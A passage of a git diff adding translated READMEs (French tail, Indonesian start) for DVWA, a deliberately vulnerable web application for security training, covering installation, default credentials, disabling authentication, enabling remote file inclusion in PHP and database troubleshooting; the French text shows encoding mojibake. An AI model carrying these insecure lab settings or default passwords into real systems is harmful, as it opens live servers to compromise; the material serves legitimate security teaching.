(par exemps, "Ê" n'est pas la mÃĒme lettre que "e"; et "E" n'est pas lettre que "e"), donc vous pourriez tomber sur un 404 si vous n'y prenez pas garde. +Les URL suivantes vous donneront une erreur 404 : +- `http://localhost/MonDossier/salut.txt` +- `http://localhost/mondossier/Salut.txt` +- `http://localhost/MONDOSSIER/salut.txt` + +Pourquoi cela affecte BAWV ? La plupart des gens utilisent Git intÊgrer BAWV dans leur rÊpertoire `/var/www/html`, cela leur donne donc le chemin `/var/www/html/DVWA` avec tous les fichiers de BAWV dedans. Du coup si vous cherchez `http://localhost/` ça vous retourne une erreur 404, ou la page par dÊfaut d'apache. Comme les fichiers sont dans le dossier DVWA, ous devez rechercher `http://localhost/DVWA/`. + +L'autre erreur commune est de rechercher `http://localhost/dvwa` ce qui retourne une erreur 404 parce que `dvwa` n'est pas pareil que `DVWA`, à cause de la casse. + +Après la configuration, si vous obtenez une erreur 404, pensez à là oÚ vous avez enregistrÊ vos fichiers, qui est accessible par un chemin relatif, et quelle est l'orthographe des dossiers dans lesquels il se situe. + +### "Accès refusÊ" pendant la configuration + +Si vous avez l'erreur suivante en exÊcutant le programme de configuration, cela veut dire que l'ID et la clef que vous avez dÊfini ne correspond pas à celle de la BDD. + +``` +Database Error #1045: Access denied for user 'nimporte'@'localhost' (using password: YES). +//signifie: "Erreur de la BDD #1045: accès refusÊ pour l'utilisateur 'nimporte'@'localhost' (utilise un mdp: OUI)" +``` + +Cette erreur signifie que vous utilisez le nom d'utilisateur `nimporte`. + +L'erreur suivante dit que vous demandez une mauvaise base de donnÊe. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +//signifie : "SQL: Accès refusÊ pour l'utilisateur 'dvwa'@'localhost' à la BDD `nimporte`." +``` + +Ça dit que vous vous connectez en tant que `dvwa` et que vous essayez de vous connecter à la BDD `nimporte`. + +La première chose à faire est de revÊrifier ce que vous avez renseignÊ dans le fichier de configuration. + +Si les informations semblent ÃĒtre correctes, la chose à revÊrifier est de regarder les journaux systèmes à propos de l'utilisateur en ligne de commande. ConsidÊrons que vous avez une BDD dÊnominÊe `dvwa` et un mot de passe `p@ssw0rd`, lancez la commande suivante. + +``` +mysql -u dvwa -p -D dvwa +//puis tapez votre mot de passe dans le champ qui apparaÃŽt +``` + +Si le texte suivant apparaÃŽt (peut varier), les identifiants sont corrects: +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` +Puisque vous pouvez vous connecter en ligne de commande, il y a quelque chose qui cloche dans le fichier de configuration, re-vÊrifiez-le et signaler nus une erreur si vous n'arrivez pas à la trouver (sur github). + +Si le texte qui est apparu est le suivant, les identifiants sont incorrects. RÊpÊtez la [configuration de la base de donnÊes](#ParamÊtrage de la base de donnÊes) et soyez sÃģrs d'utiliser toujours les mÃĒme identifiants durant la procÊdure. +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +//signifie: "Erreur 1045 (28000): Accès refusÊ pour l'utilisateur 'dvwa'@'localhost' (clÊ renseignÊe: OUI)" +``` + +Si vous obtenez l'erreur suivante, les identifiants sont corrects mais l'utilisateur n'a pas accès à la database. +RÊitÊrez aussi le paramÊtrage de la base de donnÊes et vÊrifiez le nom de la base de donnÊes. +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +//signifie: "Erreur 1044 (42000): Accès refusÊ pour l'utilisateur 'dvwa'@'localhost' à la BDD 'dvwa'." +``` + +La dèrnière erreur peut ÃĒtre celle-ci: +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` +Ça n'est pas une erreur d'authentification, c'est juste que le système de gestion de la BDD n'est pas activÊe. DÊmarrez-le en tapant : +```sh +sudo service mysql start +``` + +### MÊthode d'identification inconnue + +Avec les versions les plus rÊcentes de MySQL, PHP ne peut plus Êchanger avec la BDD dans sa configuration initiale. Si vous obtenez cette erreur, c'est que vous possÊdez cette configuration :(. +``` +Database Error #2054: The server requested authentication method unknown to the client. +//Signification: "Erreur de BDD #2045: la mÊthode authentification utilisÊe est inconnue." +``` + +Vous avez deux options, la première Êtant de dÊsinstaller MySQL et d'installez MariaDB. Ce lien vous envoie vers le manuel officiel de MariaDB. + (en anglais) + +Sinon, suivez ces Êtapes: + +1. En tant que root, Êditez le fichier `/etc/mysql/mysql.conf.d/mysqld.cnf` +1. sous la ligne `[mysqld]`, ajoutez + `default-authentication-plugin=mysql_native_password` +1. redÊmarrez MySQL: `sudo service mysql restart` +1. VÊrifiez le mÊthode de connexion pour votre utilisateur: + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` +1. Vous verrez probablement `caching_sha2_password`. Si c'est le cas, tapez: + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` +1. Relancez la vÊrification, vous devriez voir `mysql_native_password`. + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` +Après tout ça, le processus de configuration devrait fonctionner. +Pour plus d'infos, voyez: . + +### Database Error #2002: No such file or directory. + +Le serveur de BDD est inactif. Sur une distro basÊe Debian, tapez: +```sh +sudo service mysql start +``` +### Erreurs "MySQL server has gone away" et "Packets out of order" + +Vous pourriez rencontrer cette erreur pour maintes raisons, mais la plus plausible est que la version de votre SGBDD est incompatible avec PHP. +Cela ce produit gÊnÊralement quand vous utilisez la dernière version de MySQL, mais pas de PHP et que ça ne foncitonne pas oufement bien. Notre meilleur conseil est de dÊsinstaller MySQL et d'installer MariaDB, sinon nous ne pouvons pas vous aider. + +### L'injection de commande ne fonctionne pas + +Apache n'a peut ÃĒtre pas assez de privilèges sur le serveur web. Si vous utilisez BAWV sur linux, veillez à ÃĒtre connectÊ en tant que root et sous windows, en tant qu'administrateur. + +### Pourquoi ne puis-je pas me connecter à ma BDD sous CentOS + +Vous avez sÃģrement des prolèmes avec SELinux. DÊsinstaller SELinux ou lancez cette commande pour autoriser le serveur web à discutter avec la base de donnÊe: +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Autre chose + +Si vous avez besoin d'aide, lisez les rapports d'erreurs ouvert et/ou fermÊs dans le dÊpôt git: + + +Avant d'envoyer un rapport, soyez-sÃģr que vous utilisez la dernière version du code du dÊpôt. Pas que la dernière version, mais aussi les derniers codes de la branche maÃŽtresse (master). + +Si vous envoyez un rapport, renseignez ces informations: +- Système d'exploitation +- Les cinq dernières lignes du journal (log) du serveur web juste après la dÊclaration de votre erreur +- Si c'est un problème de connection à la base de donnÊes, effectuÊes les Êtapes renseignÊes au dessus et faites une capture d'Êcran de chacune d'entre elles, et du fichier de configuration contenant vos identifiants. +- une description dÊtaillÊe de ce qui ne va pas, ce que vous Êspèreriez qu'il arrive, et comment vous avez essayÊ de rÊsoudre le problème. "problème de connection" n'est pas assez dÊtaillÊ pour nous aidez à rÊsoudre votre problème. +- - - + +## Injection SQL SQLite3 + +_Le support pour cette section est limitÊe, avant d'envoyer un rapport d'erreur, soyez prÊparÊ à faire un dÊboguage, ne dÊclarez pas juste "ça marche pas !"._ + +Par dÊfaut, SQLi et Blind SQLi sont exÊcutÊs sur les serveurs MariaDB/MySQL utilisÊs par le site mais il est possible de basculer vers des tests SQLi sur SQLite3 à la place. + +Je ne vais pas vous montrer comment fonctionne SQLite3 avec PHP, mais juste un exemple d'installation de `php-sqlite3` et d'ÃĒtre sÃģr qu'il soit actif. +Pour faire ce changement Êditez le fichier de configuration et Êditez ces lignes: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` +Par dÊfaut, ça utilise le fichier `database/sqli.db`, si vous vous gourrez, copiez `database/sqli.db.dist` par dessus. + +Le challenge est le mÃĒme pour MySQL, il sont juste antagoniste à SQLite3. +- - - + +## Liens + +DÊpôt GitHub: + +CrÊÊ par l'Êquipe BAWV. diff --git a/DVWA/README.id.md b/DVWA/README.id.md new file mode 100644 index 00000000..69fc9b00 --- /dev/null +++ b/DVWA/README.id.md @@ -0,0 +1,551 @@ +# DAMN VULNERABLE WEB APPLICATION / APLIKASI WEB YANG RENTAN TERHADAP ANCAMAN + +Damn Vulnerable Web Application (DVWA) atau yang dapat diartikan sebagai Aplikasi Web Yang Rentan Terhadap Ancaman merupakan aplikasi web berbasis PHP/MySQL yang sangat rentan. +Tujuan utamanya adalah menjadi alat bantu bagi para profesional keamanan untuk menguji keterampilan dan alat mereka dalam lingkungan hukum. +DVWA juga bertujuan membantu pengembang web memahami proses pengamanan aplikasi web serta memberikan dukungan bagi siswa dan guru untuk mempelajari keamanan aplikasi web dalam lingkungan kelas yang terkendali. + +Tujuan dari DVWA adalah **melatih pengguna dalam menghadapi beberapa kerentanan web paling umum** dengan **berbagai tingkat kesulitan**, yang disajikan melalui antarmuka yang sederhana dan langsung. Harap dicatat bahwa **ada kerentanan yang didokumentasikan dan tidak didokumentasikan** dalam perangkat lunak ini. Hal ini sengaja dilakukan untuk mendorong pengguna mencoba dan menemukan sebanyak mungkin masalah. + +## PERINGATAN + +Damn Vulnerable Web Application sangat rentan! **Jangan mengunggahnya ke folder html publik penyedia hosting Anda atau server yang terhubung langsung ke internet** karena dapat mengakibatkan kompromi keamanan. +Disarankan untuk menggunakan mesin virtual (seperti [VirtualBox](https://www.virtualbox.org/) atau [VMware](https://www.vmware.com/)), yang diatur dalam mode jaringan NAT. +Di dalam mesin virtual, Anda dapat mengunduh dan menginstal [XAMPP](https://www.apachefriends.org/) untuk web server dan database. + +### Penyangkalan + +Kami tidak bertanggung jawab atas cara penggunaan aplikasi ini (DVWA) oleh siapa pun. +Tujuan dari aplikasi ini telah kami jelaskan dan seharusnya tidak digunakan dengan niat jahat. +Kami telah memberikan peringatan dan mengambil langkah-langkah untuk mencegah pengguna menginstal DVWA di server web aktif secara langsung. +Jika server web Anda terpengaruh melalui instalasi DVWA, itu bukan tanggung jawab kami melainkan tanggung jawab orang/orang yang mengunggah dan menginstalnya. + +- - - + +## Lisensi + +Berkas ini merupakan bagian dari Damn Vulnerable Web Application (DVWA). + +Damn Vulnerable Web Application (DVWA) adalah perangkat lunak bebas: Anda dapat mendistribusikannya dan/atau mengubahnya +sesuai dengan ketentuan Lisensi Umum GNU yang diterbitkan oleh +Free Software Foundation, versi 3 Lisensi, atau +(pilihan Anda) versi selanjutnya. + +Damn Vulnerable Web Application (DVWA) didistribusikan dengan harapan akan bermanfaat, +tetapi TANPA GARANSI APA PUN; tanpa garansi tersirat pun +DAGANG atau SESUAI UNTUK TUJUAN TERTENTU. Lihat +Lisensi Umum GNU untuk lebih banyak detail. + +Anda seharusnya telah menerima salinan Lisensi Umum GNU bersama dengan Damn Vulnerable Web Application (DVWA). Jika tidak, lihat . + +- - - + +## Internasionalisasi + +Berkas ini tersedia dalam beberapa bahasa: +- Arab: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- Tiongkok: [įŽ€äŊ“中文](README.zh.md) +- Perancis: [Français](README.fr.md) +- Persia: [ŲØ§ØąØŗی](README.fa.md) +- Portugis: [PortuguÃĒs](README.pt.md) +- Spanyol: [EspaÃąol](README.es.md) +- Turki: [TÃŧrkçe](README.tr.md) +- Indonesia: [id](README.id.md) + +Jika Anda ingin berkontribusi dengan terjemahan, silakan kirimkan PR (Permintaan Tarik). +Namun perlu diperhatikan, ini bukan berarti hanya menjalankannya melalui Google Translate dan mengirimkannya, karena itu akan ditolak. +Kirimkan versi terjemahan Anda dengan menambahkan file baru 'README.xx.md' di mana xx adalah kode dua huruf dari bahasa yang Anda inginkan (berdasarkan [ISO 639-1](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes)). + +- - - + +## Unduh + +Meskipun terdapat berbagai versi DVWA, satu-satunya versi yang didukung adalah sumber terbaru dari repositori resmi GitHub. +Anda dapat mengklonnya dari repositori: +`git clone https://github.com/digininja/DVWA.git` + +Atau [unduh arsip ZIP dari file-file](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## Instalasi + +### Video Instalasi + +- [Instalasi DVWA di Kali yang berjalan di VirtualBox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Instalasi DVWA di Windows menggunakan XAMPP](https://youtu.be/Yzksa_WjnY0) +- [Instalasi Damn Vulnerable Web Application (DVWA) di Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +Cara paling mudah untuk menginstal DVWA adalah dengan mengunduh dan menginstal [XAMPP](https://www.apachefriends.org/) jika Anda belum memiliki pengaturan server web. +XAMPP adalah Distribusi Apache yang sangat mudah diinstal untuk Linux, Solaris, Windows, dan Mac OS X. Paket ini mencakup server web Apache, MySQL, PHP, Perl, server FTP, dan phpMyAdmin. +[Video ini](https://youtu.be/Yzksa_WjnY0) memandu Anda melalui proses instalasi untuk Windows, tetapi seharusnya serupa untuk OS lainnya. + +### Docker + +Terima kasih kepada [hoang-himself](https://github.com/hoang-himself) dan [JGillam](https://github.com/JGillam), setiap commit ke cabang `master` menyebabkan pembangunan Docker image dan siap untuk diunduh dari GitHub Container Registry. + +Untuk informasi lebih lanjut tentang apa yang Anda dapatkan, Anda dapat menjelajahi [Docker images yang sudah dibangun sebelumnya](https://github.com/digininja/DVWA/pkgs/container/dvwa). + +#### Memulai + +Prasyarat: Docker dan Docker Compose. + +- Jika Anda menggunakan Docker Desktop, keduanya seharusnya sudah terinstal. +- Jika Anda lebih memilih Docker Engine di Linux, pastikan untuk mengikuti [panduan instalasi mereka](https://docs.docker.com/engine/install/#server). + +**Kami memberikan dukungan untuk rilis Docker terbaru seperti yang ditunjukkan di atas.** +Jika Anda menggunakan Linux dan paket Docker yang disertakan dengan pengelola paket Anda, kemungkinan besar juga akan berfungsi, tetapi dukungan akan berusaha sebaik mungkin. + +Memperbarui Docker dari versi paket manajer ke upstream memerlukan penghapusan versi lama seperti yang terlihat dalam panduan mereka untuk [Ubuntu](https://docs.docker.com/engine/install/ubuntu/#uninstall-old-versions), [Fedora](https://docs.docker.com/engine/install/fedora/#uninstall-old-versions), dan lainnya. +Data Docker Anda (container, gambar, volume, dll.) seharusnya tidak terpengaruh, tetapi jika Anda mengalami masalah, pastikan untuk [memberi tahu Docker](https://www.docker.com/support) dan gunakan mesin pencari dalam waktu yang bersamaan. + +Kemudian, untuk memulai: + +1. Jalankan `docker version` dan `docker compose version` untuk melihat apakah Docker dan Docker Compose terinstal dengan benar. Anda seharusnya dapat melihat versi mereka dalam output. + + Contoh: + + ```text + >>> docker version + Client: + [...] + Version: 23.0.5 + [...] + + Server: Docker Desktop 4.19.0 (106363) + Engine: + [...] + Version: 23.0.5 + [...] + + >>> docker compose version + Docker Compose version v2.17.3 + ``` + + Jika Anda tidak melihat apa-apa atau mendapatkan pesan kesalahan "command not found" ikuti prasyarat untuk menyiapkan Docker dan Docker Compose. + +2. Klon atau unduh repositori ini dan ekstrak (lihat [Unduh](#unduh)). +3. Buka terminal pilihan Anda dan ubah direktori kerjanya ke dalam folder ini (`DVWA`). +4. Jalankan `docker compose up -d`. + +DVWA sekarang tersedia di `http://localhost:4280`. + +**Perhatikan bahwa untuk menjalankan DVWA dalam kontainer, server web mendengarkan port 4280 daripada port biasa 80.** +Untuk informasi lebih lanjut mengenai keputusan ini, lihat [Saya ingin menjalankan DVWA di port yang berbeda](#i-want-to-run-dvwa-on-a-different-port). + +#### Pembangunan Lokal + +Jika Anda melakukan perubahan lokal dan ingin membangun proyek dari lokal, buka `compose.yml` dan ubah `pull_policy: always` menjadi `pull_policy: build`. + +Menjalankan `docker compose up -d` seharusnya akan memicu Docker untuk membangun gambar dari lokal tanpa memperdulikan apa yang tersedia di registri. + +Lihat juga: [`pull_policy`](https://github.com/compose-spec/compose-spec/blob/master/05-services.md#pull_policy). + +### Paket-paket Linux + +Jika Anda menggunakan distribusi Linux berbasis Debian, Anda perlu menginstal paket-paket berikut _(atau yang setara)_: + +- apache2 +- libapache2-mod-php` +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +Saya sarankan melakukan pembaruan sebelumnya, agar Anda memastikan mendapatkan versi terbaru dari semuanya. +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` +Situs akan berfungsi dengan MySQL alih-alih MariaDB, tetapi kami sangat menyarankan MariaDB karena berfungsi tanpa masalah sedangkan Anda harus melakukan perubahan agar MySQL dapat berfungsi dengan benar. + +## Konfigurasi + +### Berkas Konfigurasi + +DVWA disertakan dengan salinan palsu dari berkas konfigurasinya yang perlu Anda salin dan lakukan perubahan yang sesuai. Pada Linux, bila Anda berada di direktori DVWA, langkah ini dapat dilakukan seperti berikut: + +`cp config/config.inc.php.dist config/config.inc.php` + +Pada Windows, langkah ini mungkin sedikit lebih sulit jika ekstensi file disembunyikan. Jika Anda tidak yakin mengenai hal ini, blog post berikut menjelaskan lebih lanjut: + +[Cara Membuat Windows Menampilkan Ekstensi File](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Pengaturan Database + +Untuk mengatur database, cukup klik tombol `Setup DVWA` di menu utama, kemudian klik tombol `Create / Reset Database`. Ini akan membuat/mereset database untuk Anda dengan beberapa data di dalamnya. + +Jika Anda menerima pesan kesalahan saat mencoba membuat database Anda, pastikan kredensial database Anda benar dalam `./config/config.inc.php`. *Ini berbeda dari config.inc.php.dist, yang merupakan berkas contoh.* + +Variabel-variabelnya diatur secara default sebagai berikut: +``` +$_DVWA['db_server'] = '127.0.0.1'; +$_DVWA['db_port'] = '3306'; +$_DVWA['db_user'] = 'dvwa'; +$_DVWA['db_password'] = 'p@ssw0rd'; +$_DVWA['db_database'] = 'dvwa'; +``` + +Perhatikan, jika Anda menggunakan MariaDB daripada MySQL (MariaDB adalah default di Kali), maka Anda tidak dapat menggunakan pengguna root database, Anda harus membuat pengguna database baru. Untuk melakukannya, sambungkan ke database sebagai pengguna root kemudian gunakan perintah-perintah berikut: +``` +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Menonaktifkan Otentikasi + +Beberapa alat tidak berfungsi dengan baik dengan otentikasi sehingga tidak dapat digunakan dengan DVWA. Untuk mengatasi ini, ada opsi konfigurasi untuk menonaktifkan pemeriksaan otentikasi. Untuk melakukannya, cukup atur yang berikut dalam berkas konfigurasi: + +``` +$_DVWA['disable_authentication'] = true; +``` + +Anda juga perlu mengatur tingkat keamanan ke tingkat yang sesuai dengan pengujian yang ingin Anda lakukan: +``` +$_DVWA['default_security_level'] = 'low'; +``` + +Dalam kondisi ini, Anda dapat mengakses semua fitur tanpa perlu masuk dan mengatur cookie apapun. + +### Izin Folder + +* `./hackable/uploads/` - Perlu dapat ditulisi oleh layanan web (untuk Unggahan File). + +### Konfigurasi PHP + +Pada sistem Linux, kemungkinan ditemukan di `/etc/php/x.x/fpm/php.ini` atau `/etc/php/x.x/apache2/php.ini`. + +* Untuk mengizinkan Remote File Inclusions (RFI): + * `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + * `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] + +* Untuk memastikan PHP menampilkan semua pesan kesalahan: + * `display_errors = on` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + * `display_startup_errors = on` [[display_startup_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-startup-errors)] + +Pastikan Anda me-restart layanan php atau Apache setelah melakukan perubahan. + +### reCAPTCHA + +Ini hanya diperlukan untuk lab "Insecure CAPTCHA", jika Anda tidak bermain dengan lab tersebut, Anda dapat mengabaikan bagian ini. + +Buat sepasang kunci API dari . + +Kemudian masukkan kunci-kunci tersebut ke bagian-bagian berikut di dalam `./config/config.inc.php`: + +* `$_DVWA['recaptcha_public_key']` +* `$_DVWA['recaptcha_private_key']` + +### Kredensial Default + +**Username default = `admin`** + +**Password default = `password`** + +_...dapat dengan mudah di-brute force ;)_ + +URL Login: http://127.0.0.1/login.php + +_Catatan: Ini akan berbeda jika Anda menginstal DVWA ke direktori yang berbeda._ + +## Pemecahan Masalah + +Asumsi ini berlaku jika Anda menggunakan distribusi berbasis Debian, seperti Debian, Ubuntu, dan Kali. Untuk distribusi lainnya, ikuti langkah-langkah ini, tetapi perbarui perintah sesuai kebutuhan. + +### Kontainer + +#### Saya ingin mengakses log + +Jika Anda menggunakan Docker Desktop, log dapat diakses dari aplikasi grafis. +Beberapa detail kecil mungkin berubah dengan versi terbaru, tetapi metode akses seharusnya tetap sama. + +![Overview of DVWA compose](./docs/graphics/docker/overview.png) + +![Viewing DVWA logs](docs/graphics/docker/detail.png) + +Log juga dapat diakses dari terminal. + +1. Buka terminal dan ubah direktori kerjanya ke DVWA. +2. Tampilkan log yang telah digabungkan. + + ``` + docker compose logs + ``` + + Jika Anda ingin mengekspor log ke file, misalnya `dvwa.log` + + ``` + docker compose logs >dvwa.log + ``` + +#### Saya ingin menjalankan DVWA di port yang berbeda + +Kami tidak menggunakan port 80 secara default karena beberapa alasan: + +- Beberapa pengguna mungkin sudah menjalankan sesuatu di port 80. +- Beberapa pengguna mungkin menggunakan mesin kontainer tanpa hak istimewa (seperti Podman), dan 80 adalah port yang memerlukan hak istimewa (< 1024). Konfigurasi tambahan (misalnya, pengaturan `net.ipv4.ip_unprivileged_port_start`) diperlukan, tetapi Anda harus melakukan penelitian sendiri. + +Anda dapat mengekspos DVWA di port yang berbeda dengan mengubah ikatan port dalam berkas `compose.yml`. +Sebagai contoh, Anda dapat mengubah + +``` +ports: + - 127.0.0.1:4280:80 +``` + +Menjadi + +``` +ports: + - 127.0.0.1:8806:80 +``` + +DVWA sekarang dapat diakses di `http://localhost:8806`. + +#### DVWA Mulai Otomatis Saat Docker Berjalan + +Berkas [`compose.yml`](./compose.yml) yang disertakan secara otomatis menjalankan DVWA dan basis data ketika Docker berjalan. + +Untuk menonaktifkan ini, Anda dapat menghapus atau mengomentari baris `restart: unless-stopped` dalam berkas [`compose.yml`](./compose.yml). + +Jika Anda ingin menonaktifkan perilaku ini secara sementara, Anda dapat menjalankan `docker compose stop`, atau menggunakan Docker Desktop, temukan `dvwa` dan klik Stop. +Selain itu, Anda dapat menghapus kontainer atau menjalankan `docker compose down`. + +### Berkas Log + +Pada sistem Linux, Apache secara default menghasilkan dua berkas log, `access.log` dan `error.log`, dan pada sistem berbasis Debian biasanya berada di `/var/log/apache2/`. + +Ketika mengirimkan laporan kesalahan, masalah, atau hal lainnya, harap sertakan setidaknya lima baris terakhir dari masing-masing berkas ini. Pada sistem berbasis Debian, Anda dapat mendapatkannya seperti ini: +``` +tail -n 5 /var/log/apache2/access.log /var/log/apache2/error.log +``` + +### Saya mencoba membuka situs dan mendapatkan 404 + +Jika Anda mengalami masalah ini, Anda perlu memahami lokasi berkas. Secara default, root dokumen Apache (tempat mulai mencari konten web) adalah `/var/www/html`. Jika Anda meletakkan berkas `hello.txt` di direktori ini, untuk mengaksesnya, Anda akan membuka `http://localhost/hello.txt`. + +Jika Anda membuat direktori dan meletakkan berkas di dalamnya - `/var/www/html/mydir/hello.txt` - Anda kemudian perlu membuka `http://localhost/mydir/hello.txt`. + +Linux secara default bersifat case-sensitive, sehingga dalam contoh di atas, jika Anda mencoba membuka salah satu dari ini, Anda akan mendapatkan `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +Bagaimana ini memengaruhi DVWA? Kebanyakan orang menggunakan git untuk mengecek DVWA ke dalam `/var/www/html`, ini memberi mereka direktori `/var/www/html/DVWA/` dengan semua berkas DVWA di dalamnya. Mereka kemudian membuka `http://localhost/` dan mendapatkan entah `404` atau halaman selamat datang Apache default. Karena berkas berada di DVWA, Anda harus membuka `http://localhost/DVWA`. + +Kesalahan umum lainnya adalah membuka `http://localhost/dvwa` yang akan memberikan `404` karena `dvwa` bukanlah `DVWA` yang dianggap oleh pencocokan direktori Linux. + +Jadi setelah instalasi, jika Anda mencoba mengunjungi situs dan mendapatkan `404`, pertimbangkan di mana Anda menginstal berkas tersebut, di mana berkas tersebut relatif terhadap root dokumen, dan apa huruf kecil dan besar dari direktori yang Anda gunakan. + +### "Access denied" saat menjalankan setup + +Jika Anda melihat pesan berikut saat menjalankan skrip setup, itu berarti nama pengguna atau kata sandi dalam berkas konfigurasi tidak sesuai dengan yang dikonfigurasi pada basis data: +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +Error ini memberi tahu Anda bahwa Anda menggunakan nama pengguna `notdvwa`. + +Error berikut mengatakan bahwa Anda telah menunjuk berkas konfigurasi ke basis data yang salah. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +Ini mengatakan bahwa Anda menggunakan pengguna `dvwa` dan mencoba terhubung ke basis data `notdvwa`. + +Hal pertama yang harus dilakukan adalah memeriksa kembali apakah yang Anda kira telah dimasukkan ke dalam berkas konfigurasi sesuai dengan yang sebenarnya ada di sana. + +Jika sesuai dengan harapan Anda, langkah berikutnya adalah memeriksa apakah Anda dapat masuk sebagai pengguna tersebut melalui baris perintah. Mengasumsikan Anda memiliki pengguna basis data `dvwa` dan kata sandi `p@ssw0rd`, jalankan perintah berikut: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*Catatan: Tidak ada spasi setelah -p* + +Jika Anda melihat yang berikut, kata sandi sudah benar: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +Seiring terhubung melalui baris perintah, kemungkinan ada kesalahan dalam berkas konfigurasi. Periksa kembali dan laporkan masalah jika Anda masih belum bisa membuat semuanya berfungsi. + +Jika Anda melihat yang berikut, nama pengguna atau kata sandi yang Anda gunakan salah. Ulangi langkah-langkah [Database Setup](#database-setup) dan pastikan Anda menggunakan nama pengguna dan kata sandi yang sama sepanjang proses. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +Jika Anda mendapatkan yang berikut, kredensial pengguna benar tetapi pengguna tidak memiliki akses ke basis data. Sekali lagi, ulangi langkah-langkah setup dan periksa nama basis data yang Anda gunakan. +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +Kesalahan yang mungkin Anda dapatkan adalah ini: +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +Ini bukan masalah otentikasi tetapi memberi tahu Anda bahwa server basis data tidak berjalan. Mulailah dengan perintah berikut: +``` +sudo service mysql start +``` + +### Metode otentikasi tidak dikenal + +Dengan versi MySQL terbaru, PHP tidak lagi dapat berkomunikasi dengan basis data dalam konfigurasi default. Jika Anda mencoba menjalankan skrip setup dan mendapatkan pesan berikut, itu berarti Anda memiliki konfigurasi. + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +Anda memiliki dua pilihan, yang paling mudah adalah menghapus MySQL dan menginstal MariaDB. Berikut adalah panduan resmi dari proyek MariaDB: + + +Sebagai alternatif, ikuti langkah-langkah berikut: + +1. Sebagai root, edit berkas berikut: `/etc/mysql/mysql.conf.d/mysqld.cnf` + +2. Di bawah baris [mysqld], tambahkan baris berikut: + ```default-authentication-plugin=mysql_native_password``` +3. Restart database: ```sudo service mysql restart``` +4. Periksa metode autentikasi untuk pengguna database Anda: + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` +5. Kemungkinan besar Anda akan melihat `caching_sha2_password`. Jika ya, jalankan perintah berikut: + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` +6. Menjalankan pemeriksaan ulang, seharusnya sekarang Anda akan melihat `mysql_native_password`. + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` +Setelah semua langkah tersebut, proses penyiapan seharusnya sekarang berjalan dengan normal. +Jika Anda ingin informasi lebih lanjut, lihat halaman berikut: . + +### Database Error #2002: Tidak ada file atau direktori yang sesuai. + 